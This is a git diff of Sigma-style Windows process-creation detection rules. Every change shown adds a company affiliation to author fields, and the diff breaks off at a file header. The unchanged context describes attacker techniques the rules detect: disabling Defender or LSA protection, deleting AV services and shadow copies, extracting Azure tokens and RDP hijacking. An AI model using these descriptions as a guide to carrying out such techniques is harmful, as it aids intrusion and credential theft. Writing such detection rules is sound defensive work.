 - https://github.com/quarkslab/quarkspwdump
 - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/05
 tags:
 - attack.credential_access
diff --git a/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml b/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml
index 6ad785f4a..6b8b2b605 100644
--- a/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml
+++ b/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use
 references:
 - https://twitter.com/MichalKoczwara/status/1553634816016498688
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/01
 modified: 2023/01/19
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml b/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml
index 1e60e08a3..c2a38e6ff 100644
--- a/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml
+++ b/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml
@@ -4,7 +4,7 @@ status: test
 description: This command line patterns found in BlackByte Ransomware operations
 references:
 - https://redcanary.com/blog/blackbyte-ransomware/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/25
 logsource:
 category: process_creation
diff --git a/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml b/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml
index dabffeceb..88412dd13 100644
--- a/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml
+++ b/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml
@@ -2,7 +2,7 @@ title: Raspberry Robin Dot Ending File
 id: a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a
 status: experimental
 description: Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 references:
 - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/
 date: 2022/10/28
diff --git a/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml b/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml
index 02275baaa..dec5679d5 100644
--- a/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml
+++ b/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml
@@ -5,7 +5,7 @@ description: Detects RDP session hijacking by using MSTSC shadowing
 references:
 - https://twitter.com/kmkz_security/status/1220694202301976576
 - https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/01/24
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml b/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml
index f654508bf..e216cb8ff 100644
--- a/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml
+++ b/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml
@@ -5,7 +5,7 @@ description: Detects a suspicious output redirection to the local admins share,
 references:
 - https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/
 - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/16
 modified: 2022/09/09
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml
index ba2cce1b8..cfc7d3217 100644
--- a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml
+++ b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml
@@ -5,7 +5,7 @@ description: Detects suspicious command line reg.exe tool adding key to RUN key
 references:
 - https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/
 - https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/06/28
 modified: 2023/01/30
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml b/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml
index d22a080a4..9b7110016 100644
--- a/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml
+++ b/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not
 references:
 - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/02
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml b/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml
index aa75ba237..dcacb2b59 100644
--- a/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml
+++ b/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml
@@ -5,7 +5,7 @@ description: Detects reg command lines that disable certain important features o
 references:
 - https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/
 - https://github.com/swagkarna/Defeat-Defender-V1.2.0
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/22
 modified: 2022/11/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml b/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml
index be5a0b2df..75906f81b 100644
--- a/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml
+++ b/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products
 references:
 - https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html
-author: Nasreddine Bencherchali, Tim Shelton
+author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton
 date: 2022/08/08
 modified: 2022/08/12
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml b/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml
index 223e02eb4..080e31374 100644
--- a/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml
+++ b/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services
 references:
 - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/01
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml b/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml
index caeb706e9..e64e20c9a 100644
--- a/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml
+++ b/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the execution of reg.exe and subsequent command line arguments for enabling RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' subkeys
 references:
 - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
-author: '@Kostastsale, @TheDFIRReport, slightly modified by pH-T'
+author: '@Kostastsale, @TheDFIRReport, slightly modified by pH-T (Nextron Systems)'
 date: 2022/02/12
 modified: 2022/09/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml b/rules/windows/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml
index 9a863e6ce..cc5677a47 100644
--- a/rules/windows/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml
+++ b/rules/windows/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process
 references:
     - https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/22
 modified: 2023/01/30
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml b/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml
index ffc2260d7..54a382a8b 100644
--- a/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml
+++ b/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml
@@ -19,7 +19,7 @@ references:
     - https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks
     - https://twitter.com/christophetd/status/1164506034720952320
     - https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/
-author: Matthew Green - @mgreen27, Florian Roth, frack113
+author: Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113
 date: 2019/06/15
 modified: 2023/01/23
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml b/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml
index 7ddb6a472..2502f66cf 100644
--- a/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml
+++ b/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)
 references:
     - https://twitter.com/mariuszbit/status/1531631015139102720
-author: Max Altgelt
+author: Max Altgelt (Nextron Systems)
 date: 2022/06/02
 tags:
     - attack.t1528
diff --git a/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml b/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml
index 0abcaf1fe..d43e959fb 100644
--- a/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml
+++ b/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects process creation with a renamed Msdt.exe
 references:
     - https://lolbas-project.github.io/lolbas/Binaries/Msdt/
-author: pH-T
+author: pH-T (Nextron Systems)
 date: 2022/06/03
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml b/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml
index 7660f221d..fc4c10b5f 100644
--- a/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml
+++ b/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of renamed client32.exe (NetSupport RAT) via Imphash, Product and OriginalFileName strings
 references:
     - https://redcanary.com/blog/misbehaving-rats/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/19
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml b/rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml
index ec89ae388..9f17b26f8 100644
--- a/rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml
+++ b/rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the execution of a renamed office binaries
 references:
     - https://infosec.exchange/@sbousseaden/109542254124022664
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/20
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_renamed_plink.yml b/rules/windows/process_creation/proc_creation_win_renamed_plink.yml
index 0c0082fa3..07354f9e0 100644
--- a/rules/windows/process_creation/proc_creation_win_renamed_plink.yml
+++ b/rules/windows/process_creation/proc_creation_win_renamed_plink.yml
@@ -5,7 +5,7 @@ description: Execution of a renamed version of the Plink binary
 references:
     - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/
     - https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/06
 modified: 2022/08/04
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml b/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml
index 0e7a7715a..e7071719b 100644
--- a/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml
+++ b/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects the execution of a renamed ProcDump executable often used by attackers or malware
 references:
     - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/11/18
 modified: 2022/12/08
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml b/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml
index c3a495b97..d52d8db30 100644
--- a/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml
+++ b/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml
@@ -8,7 +8,7 @@ description: Detects when 'DllRegisterServer' is called in the commandline and t
 references:
     - https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20
     - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/22
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml b/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml
index 4a955383b..3213606c2 100644
--- a/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml
+++ b/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
 references:
     - https://redcanary.com/blog/misbehaving-rats/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/19
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml b/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml
index 0f751c056..2ebafff91 100644
--- a/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml
+++ b/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml
@@ -5,7 +5,7 @@ description: Detects the use of a renamed SysInternals Sdelete, which is somethi
 references:
     - https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
     - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/09/06
 tags:
     - attack.impact
diff --git a/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml b/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml
index cedf389d6..846719a0b 100644
--- a/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml
+++ b/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml
@@ -5,7 +5,7 @@ description: Detects the execution of whoami that has been renamed to a differen
 references:
     - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/
     - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/08/12
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml b/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml
index b8d02dd2d..e1a101883 100644
--- a/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml
+++ b/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml
@@ -6,7 +6,7 @@ references:
     - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809
     - https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html
     - https://twitter.com/cyb3rops/status/1514217991034097664
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/04/13
 tags:
     - attack.initial_access
diff --git a/rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml b/rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml
index 5d9a0d1e5..e34a064cd 100644
--- a/rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml
@@ -5,7 +5,7 @@ description: Detects execution of ruby using the "-e" flag. This is could be use
 references:
     - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
     - https://www.revshells.com/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/02
 tags:
     - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml b/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml
index db4dddade..94a2271a2 100644
--- a/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml
+++ b/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the execution of rundll32 with a command line that doesn't contain a .dll file
 references:
     - https://twitter.com/mrd0x/status/1481630810495139841?s=12
-author: Tim Shelton, Florian Roth, Yassine Oukessou (fix + fp)
+author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)
 date: 2022/01/13
 modified: 2023/01/25
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml b/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml
index efed71c08..0e0f9217f 100644
--- a/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml
+++ b/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects rundll32 execution where the DLL is located on a remote location (share)
 references:
     - https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/10
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml b/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml
index e3645cf89..e817b0c40 100644
--- a/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml
+++ b/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection
 references:
     - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/01
 tags:
     - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml b/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml
index d502517fb..2f6f2ed42 100644
--- a/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml
+++ b/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml
@@ -4,7 +4,7 @@ status: experimental
 description: 'Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local'
 references:
     - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
-author: 'pH-T, Nasreddine Bencherchali'
+author: 'pH-T (Nextron Systems), Nasreddine Bencherchali'
 date: 2022/03/15
 modified: 2022/07/28
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml b/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml
index acdafd14d..df599fa50 100644
--- a/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml
+++ b/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00
 references:
     - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte
-author: pH-T
+author: pH-T (Nextron Systems)
 date: 2022/07/15
 logsource:
     category: process_creation
diff --git a/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml b/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml
index 6dd67db17..598d992c5 100644
--- a/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious powershell execution that ends with a common flag instead of a command or a filename to execute (could be a sign of implicit execution that uses files in WindowsApps directory)
 references:
     - https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/
-author: 'pH-T, Florian Roth'
+author: 'pH-T (Nextron Systems), Florian Roth'
 date: 2022/04/08
 tags:
     - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml b/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml
index 55586acbd..c19083d12 100644
--- a/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml
+++ b/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.
 references:
     - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
-author: '@Kostastsale, @TheDFIRReport, slightly modified by pH-T'
+author: '@Kostastsale, @TheDFIRReport, slightly modified by pH-T (Nextron Systems)'
 date: 2022/02/12
 modified: 2022/03/15
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_schtasks_system.yml b/rules/windows/process_creation/proc_creation_win_schtasks_system.yml
index 784d00cad..67fe1e960 100644
--- a/rules/windows/process_creation/proc_creation_win_schtasks_system.yml
+++ b/rules/windows/process_creation/proc_creation_win_schtasks_system.yml
@@ -5,7 +5,7 @@ description: Detects the creation or update of a scheduled task to run with "NT
 references:
     - https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern
     - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/28
 tags:
     - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml b/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml
index e6dfb85f2..690e3f001 100644
--- a/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml
+++ b/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml
@@ -5,7 +5,7 @@ description: Detects suspicious sub processes started by the ScreenConnect clien
 references:
     - https://www.mandiant.com/resources/telegram-malware-iranian-espionage
     - https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/25
 modified: 2022/07/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_selectmyparent.yml b/rules/windows/process_creation/proc_creation_win_selectmyparent.yml
index f61a2159b..70e01edc2 100644
--- a/rules/windows/process_creation/proc_creation_win_selectmyparent.yml
+++ b/rules/windows/process_creation/proc_creation_win_selectmyparent.yml
@@ -7,7 +7,7 @@ references:
     - https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks
     - https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing
     - https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/07/23
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_set_unsecure_powershell_policy.yml b/rules/windows/process_creation/proc_creation_win_set_unsecure_powershell_policy.yml
index 7844a5267..2e0c2c18d 100644
--- a/rules/windows/process_creation/proc_creation_win_set_unsecure_powershell_policy.yml
+++ b/rules/windows/process_creation/proc_creation_win_set_unsecure_powershell_policy.yml
@@ -11,7 +11,7 @@ status: experimental
 description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine
 references:
     - https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/11
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml b/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml
index 715a8526f..7ce2e9319 100644
--- a/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml
+++ b/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml
@@ -12,7 +12,7 @@ references:
     - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar
     - https://redcanary.com/blog/intelligence-insights-october-2021/
     - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware
-author: Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
+author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
 date: 2019/10/22
 modified: 2022/11/03
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml
index ed5fe8397..6741fa4fa 100644
--- a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml
+++ b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml
@@ -8,7 +8,7 @@ description: Detects usage of the Sharp Chisel via the commandline arguments
 references:
     - https://github.com/shantanu561993/SharpChisel
     - https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/05
 modified: 2022/09/13
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_sharp_ldap_monitor.yml b/rules/windows/process_creation/proc_creation_win_sharp_ldap_monitor.yml
index 326d40318..32654d7fd 100644
--- a/rules/windows/process_creation/proc_creation_win_sharp_ldap_monitor.yml
+++ b/rules/windows/process_creation/proc_creation_win_sharp_ldap_monitor.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.
 references:
     - https://github.com/p0dalirius/LDAPmonitor
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/30
 tags:
     - attack.discovery
diff --git a/rules/windows/process_creation/proc_creation_win_sharpup.yml b/rules/windows/process_creation/proc_creation_win_sharpup.yml
index 73e49d592..000734e5a 100644
--- a/rules/windows/process_creation/proc_creation_win_sharpup.yml
+++ b/rules/windows/process_creation/proc_creation_win_sharpup.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the use of SharpUp, a tool for local privilege escalation
 references:
     - https://github.com/GhostPack/SharpUp
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/08/20
 modified: 2022/10/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml b/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml
index 41f079839..571bbd100 100644
--- a/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml
+++ b/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.
 references:
     - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
-author: Florian Roth, Tim Shelton
+author: Florian Roth (Nextron Systems), Tim Shelton
 date: 2018/04/06
 modified: 2023/01/19
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_ssh_port_forward.yml b/rules/windows/process_creation/proc_creation_win_ssh_port_forward.yml
index 1032d7364..6cf6d94e0 100644
--- a/rules/windows/process_creation/proc_creation_win_ssh_port_forward.yml
+++ b/rules/windows/process_creation/proc_creation_win_ssh_port_forward.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious SSH tunnel port forwarding to a local port
 references:
     - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/12
 modified: 2023/01/25
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_ssh_rdp_tunneling.yml b/rules/windows/process_creation/proc_creation_win_ssh_rdp_tunneling.yml
